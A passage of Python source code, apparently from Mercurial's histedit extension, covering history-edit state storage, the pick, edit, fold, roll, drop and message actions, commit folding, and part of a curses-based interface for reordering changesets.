for l in lines])\n\n\nclass histeditstate(object):\n def __init__(self, repo):\n self.repo = repo\n self.actions = None\n self.keep = None\n self.topmost = None\n self.parentctxnode = None\n self.lock = None\n self.wlock = None\n self.backupfile = None\n self.stateobj = statemod.cmdstate(repo, b'histedit-state')\n self.replacements = []\n\n def read(self):\n \"\"\"Load histedit state from disk and set fields appropriately.\"\"\"\n if not self.stateobj.exists():\n cmdutil.wrongtooltocontinue(self.repo, _(b'histedit'))\n\n data = self._read()\n\n self.parentctxnode = data[b'parentctxnode']\n actions = parserules(data[b'rules'], self)\n self.actions = actions\n self.keep = data[b'keep']\n self.topmost = data[b'topmost']\n self.replacements = data[b'replacements']\n self.backupfile = data[b'backupfile']\n\n def _read(self):\n fp = self.repo.vfs.read(b'histedit-state')\n if fp.startswith(b'v1\\n'):\n data = self._load()\n parentctxnode, rules, keep, topmost, replacements, backupfile = data\n else:\n data = pickle.loads(fp)\n parentctxnode, rules, keep, topmost, replacements = data\n backupfile = None\n rules = b\"\\n\".join([b\"%s %s\" % (verb, rest) for [verb, rest] in rules])\n\n return {\n b'parentctxnode': parentctxnode,\n b\"rules\": rules,\n b\"keep\": keep,\n b\"topmost\": topmost,\n b\"replacements\": replacements,\n b\"backupfile\": backupfile,\n }\n\n def write(self, tr=None):\n if tr:\n tr.addfilegenerator(\n b'histedit-state',\n (b'histedit-state',),\n self._write,\n location=b'plain',\n )\n else:\n with self.repo.vfs(b\"histedit-state\", b\"w\") as f:\n self._write(f)\n\n def _write(self, fp):\n fp.write(b'v1\\n')\n fp.write(b'%s\\n' % hex(self.parentctxnode))\n fp.write(b'%s\\n' % hex(self.topmost))\n fp.write(b'%s\\n' % (b'True' if self.keep else b'False'))\n fp.write(b'%d\\n' % len(self.actions))\n for action in self.actions:\n fp.write(b'%s\\n' % action.tostate())\n fp.write(b'%d\\n' % len(self.replacements))\n for replacement in self.replacements:\n fp.write(\n b'%s%s\\n'\n % (\n hex(replacement[0]),\n b''.join(hex(r) for r in replacement[1]),\n )\n )\n backupfile = self.backupfile\n if not backupfile:\n backupfile = b''\n fp.write(b'%s\\n' % backupfile)\n\n def _load(self):\n fp = self.repo.vfs(b'histedit-state', b'r')\n lines = [l[:-1] for l in fp.readlines()]\n\n index = 0\n lines[index] # version number\n index += 1\n\n parentctxnode = bin(lines[index])\n index += 1\n\n topmost = bin(lines[index])\n index += 1\n\n keep = lines[index] == b'True'\n index += 1\n\n # Rules\n rules = []\n rulelen = int(lines[index])\n index += 1\n for i in pycompat.xrange(rulelen):\n ruleaction = lines[index]\n index += 1\n rule = lines[index]\n index += 1\n rules.append((ruleaction, rule))\n\n # Replacements\n replacements = []\n replacementlen = int(lines[index])\n index += 1\n for i in pycompat.xrange(replacementlen):\n replacement = lines[index]\n original = bin(replacement[:40])\n succ = [\n bin(replacement[i : i + 40])\n for i in range(40, len(replacement), 40)\n ]\n replacements.append((original, succ))\n index += 1\n\n backupfile = lines[index]\n index += 1\n\n fp.close()\n\n return parentctxnode, rules, keep, topmost, replacements, backupfile\n\n def clear(self):\n if self.inprogress():\n self.repo.vfs.unlink(b'histedit-state')\n\n def inprogress(self):\n return self.repo.vfs.exists(b'histedit-state')\n\n\nclass histeditaction(object):\n def __init__(self, state, node):\n self.state = state\n self.repo = state.repo\n self.node = node\n\n @classmethod\n def fromrule(cls, state, rule):\n \"\"\"Parses the given rule, returning an instance of the histeditaction.\"\"\"\n ruleid = rule.strip().split(b' ', 1)[0]\n # ruleid can be anything from rev numbers, hashes, \"bookmarks\" etc\n # Check for validation of rule ids and get the rulehash\n try:\n rev = bin(ruleid)\n except TypeError:\n try:\n _ctx = scmutil.revsingle(state.repo, ruleid)\n rulehash = _ctx.hex()\n rev = bin(rulehash)\n except error.RepoLookupError:\n raise error.ParseError(_(b\"invalid changeset %s\") % ruleid)\n return cls(state, rev)\n\n def verify(self, prev, expected, seen):\n \"\"\"Verifies semantic correctness of the rule\"\"\"\n repo = self.repo\n ha = hex(self.node)\n self.node = scmutil.resolvehexnodeidprefix(repo, ha)\n if self.node is None:\n raise error.ParseError(_(b'unknown changeset %s listed') % ha[:12])\n self._verifynodeconstraints(prev, expected, seen)\n\n def _verifynodeconstraints(self, prev, expected, seen):\n # by default command need a node in the edited list\n if self.node not in expected:\n raise error.ParseError(\n _(b'%s \"%s\" changeset was not a candidate')\n % (self.verb, short(self.node)),\n hint=_(b'only use listed changesets'),\n )\n # and only one command per node\n if self.node in seen:\n raise error.ParseError(\n _(b'duplicated command for changeset %s') % short(self.node)\n )\n\n def torule(self):\n \"\"\"build a histedit rule line for an action\n\n by default lines are in the form:\n \n \"\"\"\n ctx = self.repo[self.node]\n ui = self.repo.ui\n # We don't want color codes in the commit message template, so\n # disable the label() template function while we render it.\n with ui.configoverride(\n {(b'templatealias', b'label(l,x)'): b\"x\"}, b'histedit'\n ):\n summary = cmdutil.rendertemplate(\n ctx, ui.config(b'histedit', b'summary-template')\n )\n # Handle the fact that `''.splitlines() => []`\n summary = summary.splitlines()[0] if summary else b''\n line = b'%s %s %s' % (self.verb, ctx, summary)\n # trim to 75 columns by default so it's not stupidly wide in my editor\n # (the 5 more are left for verb)\n maxlen = self.repo.ui.configint(b'histedit', b'linelen')\n maxlen = max(maxlen, 22) # avoid truncating hash\n return stringutil.ellipsis(line, maxlen)\n\n def tostate(self):\n \"\"\"Print an action in format used by histedit state files\n (the first line is a verb, the remainder is the second)\n \"\"\"\n return b\"%s\\n%s\" % (self.verb, hex(self.node))\n\n def run(self):\n \"\"\"Runs the action. The default behavior is simply apply the action's\n rulectx onto the current parentctx.\"\"\"\n self.applychange()\n self.continuedirty()\n return self.continueclean()\n\n def applychange(self):\n \"\"\"Applies the changes from this action's rulectx onto the current\n parentctx, but does not commit them.\"\"\"\n repo = self.repo\n rulectx = repo[self.node]\n with repo.ui.silent():\n hg.update(repo, self.state.parentctxnode, quietempty=True)\n stats = applychanges(repo.ui, repo, rulectx, {})\n repo.dirstate.setbranch(rulectx.branch())\n if stats.unresolvedcount:\n raise error.InterventionRequired(\n _(b'Fix up the change (%s %s)') % (self.verb, short(self.node)),\n hint=_(b'hg histedit --continue to resume'),\n )\n\n def continuedirty(self):\n \"\"\"Continues the action when changes have been applied to the working\n copy. The default behavior is to commit the dirty changes.\"\"\"\n repo = self.repo\n rulectx = repo[self.node]\n\n editor = self.commiteditor()\n commit = commitfuncfor(repo, rulectx)\n if repo.ui.configbool(b'rewrite', b'update-timestamp'):\n date = dateutil.makedate()\n else:\n date = rulectx.date()\n commit(\n text=rulectx.description(),\n user=rulectx.user(),\n date=date,\n extra=rulectx.extra(),\n editor=editor,\n )\n\n def commiteditor(self):\n \"\"\"The editor to be used to edit the commit message.\"\"\"\n return False\n\n def continueclean(self):\n \"\"\"Continues the action when the working copy is clean. The default\n behavior is to accept the current commit as the new version of the\n rulectx.\"\"\"\n ctx = self.repo[b'.']\n if ctx.node() == self.state.parentctxnode:\n self.repo.ui.warn(\n _(b'%s: skipping changeset (no changes)\\n') % short(self.node)\n )\n return ctx, [(self.node, tuple())]\n if ctx.node() == self.node:\n # Nothing changed\n return ctx, []\n return ctx, [(self.node, (ctx.node(),))]\n\n\ndef commitfuncfor(repo, src):\n \"\"\"Build a commit function for the replacement of \n\n This function ensure we apply the same treatment to all changesets.\n\n - Add a 'histedit_source' entry in extra.\n\n Note that fold has its own separated logic because its handling is a bit\n different and not easily factored out of the fold method.\n \"\"\"\n phasemin = src.phase()\n\n def commitfunc(**kwargs):\n overrides = {(b'phases', b'new-commit'): phasemin}\n with repo.ui.configoverride(overrides, b'histedit'):\n extra = kwargs.get('extra', {}).copy()\n extra[b'histedit_source'] = src.hex()\n kwargs['extra'] = extra\n return repo.commit(**kwargs)\n\n return commitfunc\n\n\ndef applychanges(ui, repo, ctx, opts):\n \"\"\"Merge changeset from ctx (only) in the current working directory\"\"\"\n if ctx.p1().node() == repo.dirstate.p1():\n # edits are \"in place\" we do not need to make any merge,\n # just applies changes on parent for editing\n with ui.silent():\n cmdutil.revert(ui, repo, ctx, all=True)\n stats = mergemod.updateresult(0, 0, 0, 0)\n else:\n try:\n # ui.forcemerge is an internal variable, do not document\n repo.ui.setconfig(\n b'ui', b'forcemerge', opts.get(b'tool', b''), b'histedit'\n )\n stats = mergemod.graft(repo, ctx, labels=[b'local', b'histedit'])\n finally:\n repo.ui.setconfig(b'ui', b'forcemerge', b'', b'histedit')\n return stats\n\n\ndef collapse(repo, firstctx, lastctx, commitopts, skipprompt=False):\n \"\"\"collapse the set of revisions from first to last as new one.\n\n Expected commit options are:\n - message\n - date\n - username\n Commit message is edited in all cases.\n\n This function works in memory.\"\"\"\n ctxs = list(repo.set(b'%d::%d', firstctx.rev(), lastctx.rev()))\n if not ctxs:\n return None\n for c in ctxs:\n if not c.mutable():\n raise error.ParseError(\n _(b\"cannot fold into public change %s\") % short(c.node())\n )\n base = firstctx.p1()\n\n # commit a new version of the old changeset, including the update\n # collect all files which might be affected\n files = set()\n for ctx in ctxs:\n files.update(ctx.files())\n\n # Recompute copies (avoid recording a -> b -> a)\n copied = copies.pathcopies(base, lastctx)\n\n # prune files which were reverted by the updates\n files = [f for f in files if not cmdutil.samefile(f, lastctx, base)]\n # commit version of these files as defined by head\n headmf = lastctx.manifest()\n\n def filectxfn(repo, ctx, path):\n if path in headmf:\n fctx = lastctx[path]\n flags = fctx.flags()\n mctx = context.memfilectx(\n repo,\n ctx,\n fctx.path(),\n fctx.data(),\n islink=b'l' in flags,\n isexec=b'x' in flags,\n copysource=copied.get(path),\n )\n return mctx\n return None\n\n if commitopts.get(b'message'):\n message = commitopts[b'message']\n else:\n message = firstctx.description()\n user = commitopts.get(b'user')\n date = commitopts.get(b'date')\n extra = commitopts.get(b'extra')\n\n parents = (firstctx.p1().node(), firstctx.p2().node())\n editor = None\n if not skipprompt:\n editor = cmdutil.getcommiteditor(edit=True, editform=b'histedit.fold')\n new = context.memctx(\n repo,\n parents=parents,\n text=message,\n files=files,\n filectxfn=filectxfn,\n user=user,\n date=date,\n extra=extra,\n editor=editor,\n )\n return repo.commitctx(new)\n\n\ndef _isdirtywc(repo):\n return repo[None].dirty(missing=True)\n\n\ndef abortdirty():\n raise error.Abort(\n _(b'working copy has pending changes'),\n hint=_(\n b'amend, commit, or revert them and run histedit '\n b'--continue, or abort with histedit --abort'\n ),\n )\n\n\ndef action(verbs, message, priority=False, internal=False):\n def wrap(cls):\n assert not priority or not internal\n verb = verbs[0]\n if priority:\n primaryactions.add(verb)\n elif internal:\n internalactions.add(verb)\n elif len(verbs) > 1:\n secondaryactions.add(verb)\n else:\n tertiaryactions.add(verb)\n\n cls.verb = verb\n cls.verbs = verbs\n cls.message = message\n for verb in verbs:\n actiontable[verb] = cls\n return cls\n\n return wrap\n\n\n@action([b'pick', b'p'], _(b'use commit'), priority=True)\nclass pick(histeditaction):\n def run(self):\n rulectx = self.repo[self.node]\n if rulectx.p1().node() == self.state.parentctxnode:\n self.repo.ui.debug(b'node %s unchanged\\n' % short(self.node))\n return rulectx, []\n\n return super(pick, self).run()\n\n\n@action(\n [b'edit', b'e'],\n _(b'use commit, but allow edits before making new commit'),\n priority=True,\n)\nclass edit(histeditaction):\n def run(self):\n repo = self.repo\n rulectx = repo[self.node]\n hg.update(repo, self.state.parentctxnode, quietempty=True)\n applychanges(repo.ui, repo, rulectx, {})\n hint = _(b'to edit %s, `hg histedit --continue` after making changes')\n raise error.InterventionRequired(\n _(b'Editing (%s), commit as needed now to split the change')\n % short(self.node),\n hint=hint % short(self.node),\n )\n\n def commiteditor(self):\n return cmdutil.getcommiteditor(edit=True, editform=b'histedit.edit')\n\n\n@action([b'fold', b'f'], _(b'use commit, but combine it with the one above'))\nclass fold(histeditaction):\n def verify(self, prev, expected, seen):\n \"\"\"Verifies semantic correctness of the fold rule\"\"\"\n super(fold, self).verify(prev, expected, seen)\n repo = self.repo\n if not prev:\n c = repo[self.node].p1()\n elif not prev.verb in (b'pick', b'base'):\n return\n else:\n c = repo[prev.node]\n if not c.mutable():\n raise error.ParseError(\n _(b\"cannot fold into public change %s\") % short(c.node())\n )\n\n def continuedirty(self):\n repo = self.repo\n rulectx = repo[self.node]\n\n commit = commitfuncfor(repo, rulectx)\n commit(\n text=b'fold-temp-revision %s' % short(self.node),\n user=rulectx.user(),\n date=rulectx.date(),\n extra=rulectx.extra(),\n )\n\n def continueclean(self):\n repo = self.repo\n ctx = repo[b'.']\n rulectx = repo[self.node]\n parentctxnode = self.state.parentctxnode\n if ctx.node() == parentctxnode:\n repo.ui.warn(_(b'%s: empty changeset\\n') % short(self.node))\n return ctx, [(self.node, (parentctxnode,))]\n\n parentctx = repo[parentctxnode]\n newcommits = {\n c.node()\n for c in repo.set(b'(%d::. - %d)', parentctx.rev(), parentctx.rev())\n }\n if not newcommits:\n repo.ui.warn(\n _(\n b'%s: cannot fold - working copy is not a '\n b'descendant of previous commit %s\\n'\n )\n % (short(self.node), short(parentctxnode))\n )\n return ctx, [(self.node, (ctx.node(),))]\n\n middlecommits = newcommits.copy()\n middlecommits.discard(ctx.node())\n\n return self.finishfold(\n repo.ui, repo, parentctx, rulectx, ctx.node(), middlecommits\n )\n\n def skipprompt(self):\n \"\"\"Returns true if the rule should skip the message editor.\n\n For example, 'fold' wants to show an editor, but 'rollup'\n doesn't want to.\n \"\"\"\n return False\n\n def mergedescs(self):\n \"\"\"Returns true if the rule should merge messages of multiple changes.\n\n This exists mainly so that 'rollup' rules can be a subclass of\n 'fold'.\n \"\"\"\n return True\n\n def firstdate(self):\n \"\"\"Returns true if the rule should preserve the date of the first\n change.\n\n This exists mainly so that 'rollup' rules can be a subclass of\n 'fold'.\n \"\"\"\n return False\n\n def finishfold(self, ui, repo, ctx, oldctx, newnode, internalchanges):\n mergemod.update(ctx.p1())\n ### prepare new commit data\n commitopts = {}\n commitopts[b'user'] = ctx.user()\n # commit message\n if not self.mergedescs():\n newmessage = ctx.description()\n else:\n newmessage = (\n b'\\n***\\n'.join(\n [ctx.description()]\n + [repo[r].description() for r in internalchanges]\n + [oldctx.description()]\n )\n + b'\\n'\n )\n commitopts[b'message'] = newmessage\n # date\n if self.firstdate():\n commitopts[b'date'] = ctx.date()\n else:\n commitopts[b'date'] = max(ctx.date(), oldctx.date())\n # if date is to be updated to current\n if ui.configbool(b'rewrite', b'update-timestamp'):\n commitopts[b'date'] = dateutil.makedate()\n\n extra = ctx.extra().copy()\n # histedit_source\n # note: ctx is likely a temporary commit but that the best we can do\n # here. This is sufficient to solve issue3681 anyway.\n extra[b'histedit_source'] = b'%s,%s' % (ctx.hex(), oldctx.hex())\n commitopts[b'extra'] = extra\n phasemin = max(ctx.phase(), oldctx.phase())\n overrides = {(b'phases', b'new-commit'): phasemin}\n with repo.ui.configoverride(overrides, b'histedit'):\n n = collapse(\n repo,\n ctx,\n repo[newnode],\n commitopts,\n skipprompt=self.skipprompt(),\n )\n if n is None:\n return ctx, []\n mergemod.update(repo[n])\n replacements = [\n (oldctx.node(), (newnode,)),\n (ctx.node(), (n,)),\n (newnode, (n,)),\n ]\n for ich in internalchanges:\n replacements.append((ich, (n,)))\n return repo[n], replacements\n\n\n@action(\n [b'base', b'b'],\n _(b'checkout changeset and apply further changesets from there'),\n)\nclass base(histeditaction):\n def run(self):\n if self.repo[b'.'].node() != self.node:\n mergemod.clean_update(self.repo[self.node])\n return self.continueclean()\n\n def continuedirty(self):\n abortdirty()\n\n def continueclean(self):\n basectx = self.repo[b'.']\n return basectx, []\n\n def _verifynodeconstraints(self, prev, expected, seen):\n # base can only be use with a node not in the edited set\n if self.node in expected:\n msg = _(b'%s \"%s\" changeset was an edited list candidate')\n raise error.ParseError(\n msg % (self.verb, short(self.node)),\n hint=_(b'base must only use unlisted changesets'),\n )\n\n\n@action(\n [b'_multifold'],\n _(\n \"\"\"fold subclass used for when multiple folds happen in a row\n\n We only want to fire the editor for the folded message once when\n (say) four changes are folded down into a single change. This is\n similar to rollup, but we should preserve both messages so that\n when the last fold operation runs we can show the user all the\n commit messages in their editor.\n \"\"\"\n ),\n internal=True,\n)\nclass _multifold(fold):\n def skipprompt(self):\n return True\n\n\n@action(\n [b\"roll\", b\"r\"],\n _(b\"like fold, but discard this commit's description and date\"),\n)\nclass rollup(fold):\n def mergedescs(self):\n return False\n\n def skipprompt(self):\n return True\n\n def firstdate(self):\n return True\n\n\n@action([b\"drop\", b\"d\"], _(b'remove commit from history'))\nclass drop(histeditaction):\n def run(self):\n parentctx = self.repo[self.state.parentctxnode]\n return parentctx, [(self.node, tuple())]\n\n\n@action(\n [b\"mess\", b\"m\"],\n _(b'edit commit message without changing commit content'),\n priority=True,\n)\nclass message(histeditaction):\n def commiteditor(self):\n return cmdutil.getcommiteditor(edit=True, editform=b'histedit.mess')\n\n\ndef findoutgoing(ui, repo, remote=None, force=False, opts=None):\n \"\"\"utility function to find the first outgoing changeset\n\n Used by initialization code\"\"\"\n if opts is None:\n opts = {}\n path = urlutil.get_unique_push_path(b'histedit', repo, ui, remote)\n dest = path.pushloc or path.loc\n\n ui.status(_(b'comparing with %s\\n') % urlutil.hidepassword(dest))\n\n revs, checkout = hg.addbranchrevs(repo, repo, (path.branch, []), None)\n other = hg.peer(repo, opts, dest)\n\n if revs:\n revs = [repo.lookup(rev) for rev in revs]\n\n outgoing = discovery.findcommonoutgoing(repo, other, revs, force=force)\n if not outgoing.missing:\n raise error.Abort(_(b'no outgoing ancestors'))\n roots = list(repo.revs(b\"roots(%ln)\", outgoing.missing))\n if len(roots) > 1:\n msg = _(b'there are ambiguous outgoing revisions')\n hint = _(b\"see 'hg help histedit' for more detail\")\n raise error.Abort(msg, hint=hint)\n return repo[roots[0]].node()\n\n\n# Curses Support\ntry:\n import curses\nexcept ImportError:\n curses = None\n\nKEY_LIST = [b'pick', b'edit', b'fold', b'drop', b'mess', b'roll']\nACTION_LABELS = {\n b'fold': b'^fold',\n b'roll': b'^roll',\n}\n\nCOLOR_HELP, COLOR_SELECTED, COLOR_OK, COLOR_WARN, COLOR_CURRENT = 1, 2, 3, 4, 5\nCOLOR_DIFF_ADD_LINE, COLOR_DIFF_DEL_LINE, COLOR_DIFF_OFFSET = 6, 7, 8\nCOLOR_ROLL, COLOR_ROLL_CURRENT, COLOR_ROLL_SELECTED = 9, 10, 11\n\nE_QUIT, E_HISTEDIT = 1, 2\nE_PAGEDOWN, E_PAGEUP, E_LINEUP, E_LINEDOWN, E_RESIZE = 3, 4, 5, 6, 7\nMODE_INIT, MODE_PATCH, MODE_RULES, MODE_HELP = 0, 1, 2, 3\n\nKEYTABLE = {\n b'global': {\n b'h': b'next-action',\n b'KEY_RIGHT': b'next-action',\n b'l': b'prev-action',\n b'KEY_LEFT': b'prev-action',\n b'q': b'quit',\n b'c': b'histedit',\n b'C': b'histedit',\n b'v': b'showpatch',\n b'?': b'help',\n },\n MODE_RULES: {\n b'd': b'action-drop',\n b'e': b'action-edit',\n b'f': b'action-fold',\n b'm': b'action-mess',\n b'p': b'action-pick',\n b'r': b'action-roll',\n b' ': b'select',\n b'j': b'down',\n b'k': b'up',\n b'KEY_DOWN': b'down',\n b'KEY_UP': b'up',\n b'J': b'move-down',\n b'K': b'move-up',\n b'KEY_NPAGE': b'move-down',\n b'KEY_PPAGE': b'move-up',\n b'0': b'goto', # Used for 0..9\n },\n MODE_PATCH: {\n b' ': b'page-down',\n b'KEY_NPAGE': b'page-down',\n b'KEY_PPAGE': b'page-up',\n b'j': b'line-down',\n b'k': b'line-up',\n b'KEY_DOWN': b'line-down',\n b'KEY_UP': b'line-up',\n b'J': b'down',\n b'K': b'up',\n },\n MODE_HELP: {},\n}\n\n\ndef screen_size():\n return struct.unpack(b'hh', fcntl.ioctl(1, termios.TIOCGWINSZ, b' '))\n\n\nclass histeditrule(object):\n def __init__(self, ui, ctx, pos, action=b'pick'):\n self.ui = ui\n self.ctx = ctx\n self.action = action\n self.origpos = pos\n self.pos = pos\n self.conflicts = []\n\n def __bytes__(self):\n # Example display of several histeditrules:\n #\n # #10 pick 316392:06a16c25c053 add option to skip tests\n # #11 ^roll 316393:71313c964cc5 oops a fixup commit\n # #12 pick 316394:ab31f3973b0d include mfbt for mozilla-config.h\n # #13 ^fold 316395:14ce5803f4c3 fix warnings\n #\n # The carets point to the changeset being folded into (\"roll this\n # changeset into the changeset above\").\n return b'%s%s' % (self.prefix, self.desc)\n\n __str__ = encoding.strmethod(__bytes__)\n\n @property\n def prefix(self):\n # Some actions ('fold' and 'roll') combine a patch with a\n # previous one. Add a marker showing which patch they apply\n # to.\n action = ACTION_LABELS.get(self.action, self.action)\n\n h = self.ctx.hex()[0:12]\n r = self.ctx.rev()\n\n return b\"#%s %s %d:%s \" % (\n (b'%d' % self.origpos).ljust(2),\n action.ljust(6),\n r,\n h,\n )\n\n @util.propertycache\n def desc(self):\n summary = cmdutil.rendertemplate(\n self.ctx, self.ui.config(b'histedit', b'summary-template')\n )\n if summary:\n return summary\n # This is split off from the prefix property so that we can\n # separately make the description for 'roll' red (since it\n # will get discarded).\n return self.ctx.description().splitlines()[0].strip()\n\n def checkconflicts(self, other):\n if other.pos > self.pos and other.origpos <= self.origpos:\n if set(other.ctx.files()) & set(self.ctx.files()) != set():\n self.conflicts.append(other)\n return self.conflicts\n\n if other in self.conflicts:\n self.conflicts.remove(other)\n return self.conflicts\n\n\n# ============ EVENTS ===============\ndef movecursor(state, oldpos, newpos):\n \"\"\"Change the rule/changeset that the cursor is pointing to, regardless of\n current mode (you can switch between patches from the view patch window).\"\"\"\n state[b'pos'] = newpos\n\n mode, _ = state[b'mode']\n if mode == MODE_RULES:\n # Scroll through the list by updating the view for MODE_RULES, so that\n # even if we are not currently viewing the rules, switching back will\n # result in the cursor's rule being visible.\n modestate = state[b'modes'][MODE_RULES]\n if newpos < modestate[b'line_offset']:\n modestate[b'line_offset'] = newpos\n elif newpos > modestate[b'line_offset'] + state[b'page_height'] - 1:\n modestate[b'line_offset'] = newpos - state[b'page_height'] + 1\n\n # Reset the patch view region to the top of the new patch.\n state[b'modes'][MODE_PATCH][b'line_offset'] = 0\n\n\ndef changemode(state, mode):\n curmode, _ = state[b'mode']\n state[b'mode'] = (mode, curmode)\n if mode == MODE_PATCH:\n state[b'modes'][MODE_PATCH][b'patchcontents'] = patchcontents(state)\n\n\ndef makeselection(state, pos):\n state[b'selected'] = pos\n\n\ndef swap(state, oldpos, newpos):\n \"\"\"Swap two positions and calculate necessary conflicts in\n O(|newpos-oldpos|) time\"\"\"\n\n rules = state[b'rules']\n assert 0 <= oldpos < len(rules) and 0 <= newpos < len(rules)\n\n rules[oldpos], rules[newpos] = rules[newpos], rules[oldpos]\n\n # TODO: swap should not know about histeditrule's internals\n rules[newpos].pos = newpos\n rules[oldpos].pos = oldpos\n\n start = min(oldpos, newpos)\n end = max(oldpos, newpos)\n for r in pycompat.xrange(start, end + 1):\n rules[newpos].checkconflicts(rules[r])\n rules[oldpos].checkconflicts(rules[r])\n\n if state[b'selected']:\n makeselection(state, newpos)\n\n\ndef changeaction(state, pos, action):\n \"\"\"Change the action state on the given position to the new action\"\"\"\n rules = state[b'rules']\n assert 0 <= pos < len(rules)\n rules[pos].action = action\n\n\ndef cycleaction(state, pos, next=False):\n \"\"\"Changes the action state the next or the previous action from\n the action list\"\"\"\n rules = state[b'rules']\n assert 0 <= pos < len(rules)\n current = rules[pos].action\n\n assert current in KEY_LIST\n\n index = KEY_LIST.index(current)\n if next:\n index += 1\n else:\n index -= 1\n changeaction(state, pos, KEY_LIST[index % len(KEY_LIST)])\n\n\ndef changeview(state, delta, unit):\n \"\"\"Change the region of whatever is being viewed (a patch or the list of\n changesets). 'delta' is an amount (+/- 1) and 'unit' is 'page' or 'line'.\"\"\"\n mode, _ = state[b'mode']\n if mode != MODE_PATCH:\n return\n mode_state = state[b'modes'][mode]\n num_lines = len(mode_state[b'patchcontents'])\n page_height = state[b'page_height']\n unit = page_height if unit == b'page' else 1\n num_pages = 1 + (num_lines - 1) // page_height\n max_offset = (num_pages - 1) * page_height\n newline = mode_state[b'line_offset'] + delta * unit\n mode_state[b'line_offset'] = max(0, min(max_offset, newline))\n\n\ndef event(state, ch):\n \"\"\"Change state based on the current character input\n\n This takes the current state and based on the current character input from\n the user we change the state.\n \"\"\"\n selected = state[b'selected']\n oldpos = state[b'pos']\n rules = state[b'rules']\n\n if ch in (curses.KEY_RESIZE, b\"KEY_RESIZE\"):\n return E_RESIZE\n\n lookup_ch = ch\n if ch is not None and b'0' <= ch <= b'9':\n lookup_ch = b'0'\n\n curmode, prevmode = state[b'mode']\n action = KEYTABLE[curmode].get(\n lookup_ch, KEYTABLE[b'global'].get(lookup_ch)\n )\n if action is None:\n return\n if action in (b'down', b'move-down'):\n newpos = min(oldpos + 1, len(rules) - 1)\n movecursor(state, oldpos, newpos)\n if selected is not None or action == b'move-down':\n swap(state, oldpos, newpos)\n elif action in (b'up', b'move-up'):\n newpos = max(0, oldpos - 1)\n movecursor(state, oldpos, newpos)\n if selected is not None or action == b'move-up':\n swap(state, oldpos, newpos)\n elif action == b'next-action':\n cycleaction(state, oldpos, next=True)\n elif action == b'prev-action':\n cycleaction(state, oldpos, next=False)\n elif action == b'select':\n selected = oldpos if selected is None else None\n makeselection(state, selected)\n elif action == b'goto' and int(ch) < len(rules) and len(rules) <= 10:\n newrule = next((r for r in rules if r.origpos == int(ch)))\n movecursor(state, oldpos, newrule.pos)\n if selected is not None:\n swap(state, oldpos, newrule.pos)\n elif action.startswith(b'action-'):\n changeaction(state, oldpos, action[7:])\n elif action == b'showpatch':\n changemode(state, MODE_PATCH if curmode != MODE_PATCH else prevmode)\n elif action == b'help':\n changemode(state, MODE_HELP if curmode != MODE_HELP else prevmode)\n elif action == b'quit':\n return E_QUIT\n elif action == b'histedit':\n return E_HISTEDIT\n elif action == b'page-down':\n return E_PAGEDOWN\n elif action == b'page-up':\n return E_PAGEUP\n elif action == b'line-down':\n return E_LINEDOWN\n elif action == b'line-up':\n return E_LINEUP\n\n\ndef makecommands(rules):\n \"\"\"Returns a list of commands consumable by histedit --commands based on\n our list of rules\"\"\"\n commands = []\n for rules in rules:\n commands.append(b'%s %s\\n' % (rules.action, rules.ctx))\n return commands\n\n\ndef addln(win, y, x, line, color=None):\n \"\"\"Add a line to the given window left padding but 100% filled with\n whitespace characters, so that the color appears on the whole line\"\"\"\n maxy, maxx = win.getmaxyx()\n length = maxx - 1 - x\n line = bytes(line).ljust(length)[:length]\n if y < 0:\n y = maxy + y\n if x < 0:\n x = maxx + x\n if color:\n win.addstr(y, x, line, color)\n else:\n win.addstr(y, x, line)\n\n\ndef _trunc_head(line, n):\n if len(line) <= n:\n return line\n return b'> ' + line[-(n - 2) :]\n\n\ndef _trunc_tail(line, n):\n if len(line) <= n:\n return line\n return line[: n - 2] + b' >'\n\n\ndef patchcontents(state):\n repo = state[b'repo']\n rule = state[b'rules'][state[b'pos']]\n displayer = logcmdutil.changesetdisplayer(\n repo.ui, repo, {b\"patch\": True, b\"template\": b\"status\"}, buffered=True\n )\n overrides = {(b'ui', b'verbose'): True}\n with repo.ui.configoverride(overrides, source=b'histedit'):\n displayer.show(rule.ctx)\n displayer.close()\n return displayer.hunk[rule.ctx.rev()].splitlines()\n\n\ndef _chisteditmain(repo, rules, stdscr):\n try:\n curses.use_default_colors()\n except curses.error:\n pass\n\n # initialize color pattern\n curses.init_pair(COLOR_HELP, curses.COLOR_WHITE, curses.COLOR_BLUE)\n curses.init_pair(COLOR_SELECTED, curses.COLOR_BLACK, curses.COLOR_WHITE)\n curses.init_pair(COLOR_WARN, curses.COLOR_BLACK, curses.COLOR_YELLOW)\n curses.init_pair(COLOR_OK, curses.COLOR_BLACK, curses.COLOR_GREEN)\n curses.init_pair(COLOR_CURRENT, curses.COLOR_WHITE, curses.COLOR_MAGENTA)\n curses.init_pair(COLOR_DIFF_ADD_LINE, curses.COLOR_GREEN, -1)\n curses.init_pair(COLOR_DIFF_DEL_LINE, curses.COLOR_RED, -1)\n curses.init_pair(COLOR_DIFF_OFFSET, curses.COLOR_MAGENTA, -1)\n curses.init_pair(COLOR_ROLL, curses.COLOR_RED, -1)\n curses.init_pair(\n COLOR_ROLL_CURRENT, curses.COLOR_BLACK, curses.COLOR_MAGENTA\n )\n curses.init_pair(COLOR_ROLL_SELECTED, curses.COLOR_RED, curses.COLOR_WHITE)\n\n # don't display the cursor\n try:\n curses.curs_set(0)\n except curses.error:\n pass\n\n def rendercommit(win, state):\n \"\"\"Renders the commit window that shows the log of the current selected\n commit\"\"\"\n pos = state[b'pos']\n rules = state[b'rules']\n rule = rules[pos]\n\n ctx = rule.ctx\n win.box()\n\n maxy, maxx = win.getmaxyx()\n length = maxx - 3\n\n line = b\"changeset: %d:%s\" % (ctx.rev(), ctx.hex()[:12])\n win.addstr(1, 1, line[:length])\n\n line = b\"user: %s\" % ctx.user()\n win.addstr(2, 1, line[:length])\n\n bms = repo.nodebookmarks(ctx.node())\n line = b\"bookmark: %s\" % b' '.join(bms)\n win.addstr(3, 1, line[:length])\n\n line = b\"summary: %s\" % (ctx.description().splitlines()[0])\n win.addstr(4, 1, line[:length])\n\n line = b\"files: \"\n win.addstr(5, 1, line)\n fnx = 1 + len(line)\n fnmaxx = length - fnx + 1\n y = 5\n fnmaxn = maxy - (1 + y) - 1\n files = ctx.files()\n for i, line1 in enumerate(files):\n if len(files) > fnmaxn and i == fnmaxn - 1:\n win.addstr(y, fnx, _trunc_tail(b','.join(files[i:]), fnmaxx))\n y = y + 1\n break\n win.addstr(y, fnx, _trunc_head(line1, fnmaxx))\n y = y + 1\n\n conflicts = rule.conflicts\n if len(conflicts) > 0:\n conflictstr = b','.join(map(lambda r: 